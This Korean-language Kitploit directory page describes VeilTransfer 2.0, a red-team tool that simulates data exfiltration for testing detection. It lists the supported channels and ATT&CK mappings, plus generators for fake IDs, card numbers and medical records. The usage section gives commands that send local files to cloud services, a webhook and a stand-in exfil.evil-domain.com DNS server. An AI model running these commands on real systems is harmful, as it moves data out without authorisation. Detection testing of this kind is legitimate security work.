Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
VeilTransfer — VeilTransfer is a data exfiltration utility designed to test and enhance the detection capabilities. This tool simulates real-world data exfiltration techniques used by advanced threat actors, allowing organizations to evaluate and improve their security posture. | Kitploit
도구/GitHubGitHub/infosecn1nja/veiltransfer
Data ExfiltrationNetwork SecurityPenetration TestingRed Teaming
GitHubinfosecn1nja/veiltransfer

VeilTransfer

VeilTransfer is a data exfiltration utility designed to test and enhance the detection capabilities. This tool simulates real-world data exfiltration techniques used by advanced threat actors, allowing organizations to evaluate and improve their security posture.

저장소 보기
157227개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

VeilTransfer 2.0

VeilTransfer는 탐지 역량을 테스트하고 향상시키기 위해 설계된 데이터 외부 유출 유틸리티입니다. 이 도구는 고급 위협 행위자가 사용하는 실제 데이터 외부 유출 기법을 시뮬레이션하여 조직이 보안 태세를 평가하고 개선할 수 있도록 합니다. MEGA, GitHub, SFTP, WebDAV 등과 같은 여러 외부 유출 방법을 활용함으로써 VeilTransfer는 방어 체계의 허점을 식별하고 보안 솔루션이 현대의 데이터 침해에 대응할 준비가 되도록 보장합니다.

지원되는 외부 유출 방법

  • MEGA
  • GitHub
  • Dropbox
  • Telegram
  • Pastebin
  • WebDAV
  • Webhook
  • SFTP
  • FTP
  • DoH (DNS over HTTPS)
  • QUIC
  • ICMP

MITRE ATT&CK 매핑

ID기법
T1029예약된 전송
T1020자동화된 외부 유출
T1132.001데이터 인코딩: 표준 인코딩
T1560.002수집된 데이터 아카이브: 라이브러리를 통한 아카이브
T1567.001웹 서비스를 통한 외부 유출: 코드 저장소로의 외부 유출
T1567.002웹 서비스를 통한 외부 유출: 클라우드 스토리지로의 외부 유출
T1567.003웹 서비스를 통한 외부 유출: 텍스트 저장소로의 외부 유출
T1567.004웹 서비스를 통한 외부 유출: 웹훅을 통한 외부 유출
T1048.003대체 프로토콜을 통한 외부 유출: 암호화되지 않은 비-C2 프로토콜을 통한 외부 유출
T1048.002대체 프로토콜을 통한 외부 유출: 비대칭 암호화 비-C2 프로토콜을 통한 외부 유출

추가 기능

가짜 데이터 생성

VeilTransfer는 가짜 데이터 생성도 지원합니다. 여기에는 다음이 포함됩니다:

  • 인도네시아 신분증(KTP) 번호: 실제와 유사한 KTP 번호 및 관련 데이터를 생성합니다.
  • 신용카드 정보: 이름, 성, CCN(Visa/MasterCard/AMEX), 만료일을 포함하여 PCI DSS 형식의 가짜 신용카드 정보를 생성합니다.
  • 사회보장번호(SSN): 시뮬레이션 및 테스트 환경에서 사용할 수 있는 가짜 SSN을 생성합니다.
  • 의료 기록: 인도네시아어(id) 또는 영어(en)로 된 가짜 의료 기록 데이터를 생성합니다.

Zip 데이터 생성

데이터를 번들링하고 압축하기 위한 zip 파일을 쉽게 생성할 수 있으며, 이를 외부 유출이나 다양한 시나리오 테스트에 사용할 수 있습니다. 크기에 따라 여러 파일로 분할하는 옵션을 지원합니다.

사용 사례 예시

  • 레드 팀 운영: 레드 팀 훈련 중 VeilTransfer를 배포하여 정교하고 현실적인 외부 유출 시나리오로 블루 팀을 테스트합니다.
  • 퍼플 팀 협업: 방어 팀과 협력하여 외부 유출 시도를 시뮬레이션하고 탐지함으로써 공격 및 방어 전술을 모두 개선합니다.
  • 보안 테스트: VeilTransfer를 사용하여 DLP, NDR, 방화벽 및 기타 네트워크 보안 조치의 효율성을 검증합니다.

사용 예시

전송

SFTP를 통한 파일 전송

이 예시에서는 SFTP 프로토콜을 사용하여 원격 서버로 파일을 안전하게 전송하는 방법을 보여줍니다. 파일은 로컬 머신에 있으며 SSH 인증을 사용하여 지정된 원격 디렉터리로 전송됩니다.

root@kitploit:~
veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass

WebDAV 서버로 파일 전송

이 예시에서는 로컬 디렉터리의 파일을 WebDAV 서버에 업로드합니다. 서버는 인증을 위해 사용자 이름과 비밀번호를 요구합니다. 서버 매개변수에는 URI 스킴(https:// 또는 http://)이 포함됩니다.

root@kitploit:~
veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass

Mega Cloud로 파일 전송

이 예시에서는 파일을 Mega Cloud 스토리지로 전송하는 방법을 보여줍니다. 파일은 지정된 로컬 디렉터리에서 업로드되며 인증은 사용자의 Mega Cloud 자격 증명으로 처리됩니다.

root@kitploit:~
veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword

FTP를 통한 파일 전송

이 예시에서는 파일을 FTP 서버에 업로드합니다. 파일은 원격 서버의 특정 디렉터리로 전송됩니다. 서버는 인증을 위해 사용자 이름과 비밀번호를 요구합니다.

root@kitploit:~
veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword

Pastebin에 파일 업로드

이 예시에서는 파일의 내용을 Pastebin에 업로드하는 방법을 보여줍니다. 콘텐츠는 사용자가 제공한 API 키를 사용하여 Pastebin에 게시됩니다.

root@kitploit:~
veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key

GitHub 저장소로 파일 보내기

이 예시에서는 로컬 머신의 파일을 특정 GitHub 저장소로 푸시하는 방법을 보여줍니다. 파일은 사용자의 GitHub API 토큰을 사용하여 인증된 후 저장소에 추가됩니다.

root@kitploit:~
veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token

Telegram 채널로 파일 보내기

이 예시에서는 특정 Telegram 채널로 파일을 보내는 방법을 보여줍니다. 파일은 Telegram 봇 API 토큰을 사용하여 전송되며 메시지는 지정된 채널 ID로 전달됩니다.

root@kitploit:~
veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789

Webhook URL로 데이터 보내기

이 예시에서는 파일의 내용을 지정된 Webhook URL로 전송합니다.

root@kitploit:~
veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url

DoH(DNS over HTTPS)를 통한 파일 전송

DNS over HTTPS(DoH)를 활용한 안전한 데이터 외부 유출 메커니즘을 구축하려면 다음 DNS 레코드를 구성해야 합니다.

  1. A 레코드: test를 IP 주소 <VeilTransfer_IP_Address>로 지정합니다.

    test -> <VeilTransfer_IP_Address>

  2. NS 레코드: evil-domain.com이 관리하는 하위 도메인(exfil)을 정의합니다.

    exfil -> test.evil-domain.com

exfil.evil-domain.com 도메인은 DNS Exfil 도메인 역할을 합니다.

그런 다음 다음 명령으로 DoH 모드에서 VeilTransfer 서버를 시작합니다.

root@kitploit:~
veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil

참고: 암호화 키(-key)는 16자 또는 32자여야 합니다.

DoH를 통해 파일을 업로드하려면 VeilTransfer 서버가 유효한 암호화 키와 함께 DoH 모드에서 활발하게 실행 중인지 확인하세요. 그런 다음 클라이언트 명령으로 전송을 시작합니다.

root@kitploit:~
veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com

QUIC를 통한 파일 전송

QUIC 모드에서 VeilTransfer 서버를 시작하려면 다음 명령을 사용하세요.

root@kitploit:~
veiltransfer_server quic -cert /path/server.crt -key /path/server.key

서버가 실행 중이면 다음을 사용하여 파일이나 디렉터리를 업로드할 수 있습니다.

root@kitploit:~
veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443

ICMP를 통한 파일 전송

ICMP 프로토콜을 통한 파일 전송을 활성화하려면 다음 명령을 실행하여 ICMP 모드에서 VeilTransfer 서버를 시작하세요.

root@kitploit:~
veiltransfer_server_linux icmp -folder /path/folder

서버가 활성화되면 다음 명령을 실행하여 ICMP를 통해 파일이나 디렉터리를 전송합니다.

root@kitploit:~
veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server <ip address>

Zip 파일 생성

간단한 Zip 파일 생성

지정된 디렉터리에서 zip 아카이브를 생성합니다.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip

분할 Zip 파일 생성

지정된 크기에 따라 여러 부분으로 분할된 zip 아카이브를 생성합니다.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000

데이터 생성기

가짜 신용카드 번호 100개 생성

이 예시에서는 가짜 신용카드 데이터 100개 항목을 생성하는 방법을 보여줍니다. 생성된 데이터에는 신용카드 번호, 만료일 및 관련 세부 정보가 포함됩니다.

root@kitploit:~
veiltransfer_client generate-fake -ccn -count 100

가짜 인도네시아 KTP 데이터 50개 생성

이 예시에서는 인도네시아 신분증인 가짜 KTP 데이터 50개 항목을 생성하는 방법을 보여줍니다. 데이터에는 이름, 주소, KTP 번호와 같은 개인 정보가 포함됩니다.

root@kitploit:~
veiltransfer_client generate-fake -ktp -count 50

가짜 사회보장번호(SSN) 200개 생성

생성된 데이터에는 미국 표준에 따라 형식화된 사회보장번호가 포함됩니다.

root@kitploit:~
veiltransfer_client generate-fake -ssn -count 200

영어로 된 가짜 의료 기록 300개 생성

이 예시에서는 영어로 된 가짜 의료 기록 300개를 생성하는 방법을 보여줍니다.

root@kitploit:~
veiltransfer_client generate-fake -medical-record -count 300 -language en

기여

VeilTransfer에 대한 기여는 환영합니다! 새로운 기능, 외부 유출 방법 또는 개선에 대한 아이디어가 있다면 GitHub에서 풀 리퀘스트를 제출하거나 이슈를 열어 주세요.

도구 다운로드